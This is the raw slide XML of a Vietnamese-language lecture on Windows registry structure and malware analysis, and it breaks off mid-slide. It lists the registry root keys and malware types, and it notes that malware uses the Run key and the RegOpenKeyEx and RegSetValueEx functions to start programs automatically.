              <a:t>mục</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="33862037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Registry</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>Khóa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>gốc</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>HKEY_LOCAL_MACHINE (HKLM)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>Chứa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>các</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>thiết</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>lập</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>chung</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>HKEY_CURRENT_USER (HKCU)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>Chức</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>các</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>thiết</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>lập</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>cho</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>người</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>dùng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>hiện</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>tại</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>HKEY_CLASSES_ROOT</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>Chức</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>các</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>thông</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> tin </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>về</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>các</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>kiểu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>định</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>nghĩa</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>HKEY_CURRENT_CONFIG</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>Chứa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>các</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>thiết</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>lập</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>về</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>phần</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>cứng</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>HKEY_USERS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>Chứa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>các</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>thiết</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>lập</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>mặc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>định</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>của</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>người</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>dùng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>hiện</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>tại</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>người</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>dùng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>mới</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1133265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Malware</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Virus</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Worm</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Backdoor</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Trojan</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Rootkit</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Ransomware (Crypto-ransomware)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Malicious Mobile Code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Spyware/Adware</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Etc.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2233506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Registry</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Registry Editor (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>regedit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Cho </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>phép</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>hiển</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>thị</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>và</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>thao</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>tác</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>với</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>thanh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>ghi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>Tự</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>động</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>kích</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>hoạt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>chương</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>trình</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0" smtClean="0"/>
              <a:t>HKLM\Software\Microsoft\Windows\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>CurrentVersion</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0" smtClean="0"/>
              <a:t>\Run</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>Các</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>hàm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>thao</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>tác</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>với</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>thanh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>ghi</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>Mã</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>độc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>thường</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>sử</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>dụng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>các</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>hàm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>này</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>để</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>thay</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>đổi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>và</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>kích</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>hoạt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>tự</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>động</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>các</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>chương</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>trình</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>RegOpenKeyEx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>cho</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>phép</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>truy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>cập</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>và</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>thay</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>đổi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>giá</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>trị</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>thanh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>ghi</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>RegSetValueEx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>Thêm</a:t>
            </a:r>
            <a:r>
